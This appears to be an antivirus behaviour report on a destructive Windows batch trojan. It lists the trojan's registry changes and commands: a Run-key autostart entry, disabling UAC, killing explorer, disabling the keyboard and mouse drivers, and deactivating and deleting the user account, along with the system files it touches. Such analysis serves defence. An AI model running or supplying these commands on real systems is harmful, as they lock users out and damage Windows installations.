Technical information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Winlogon' = '%WINDIR%\chkmgr32.bat'
- User Account Control (UAC)
- <SYSTEM32>\tskill.exe /f icq
- <SYSTEM32>\tskill.exe /f explorer
- <SYSTEM32>\reg.exe add HKLM\System\CurrentControlSet\Services\Kbdclass /v Start /t REG_DWORD /d 4 /f
- <SYSTEM32>\reg.exe add HKLM\System\CurrentControlSet\Services\Mouclass /v Start /t REG_DWORD /d 4 /f
- <SYSTEM32>\net1.exe user %USERNAME% /active:no
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %WINDIR%\chkmgr32.bat /f
- <SYSTEM32>\net1.exe user %username% /del
- %WINDIR%\notfall.bat
- %WINDIR%\chkmgr32.bat
- %WINDIR%\inf\1394.PNF
- %WINDIR%\inf\1394vdbg.inf
- <SYSTEM32>\hal.dll
- %WINDIR%\inf\1394.inf
- ClassName: 'Shell_TrayWnd' WindowName: ''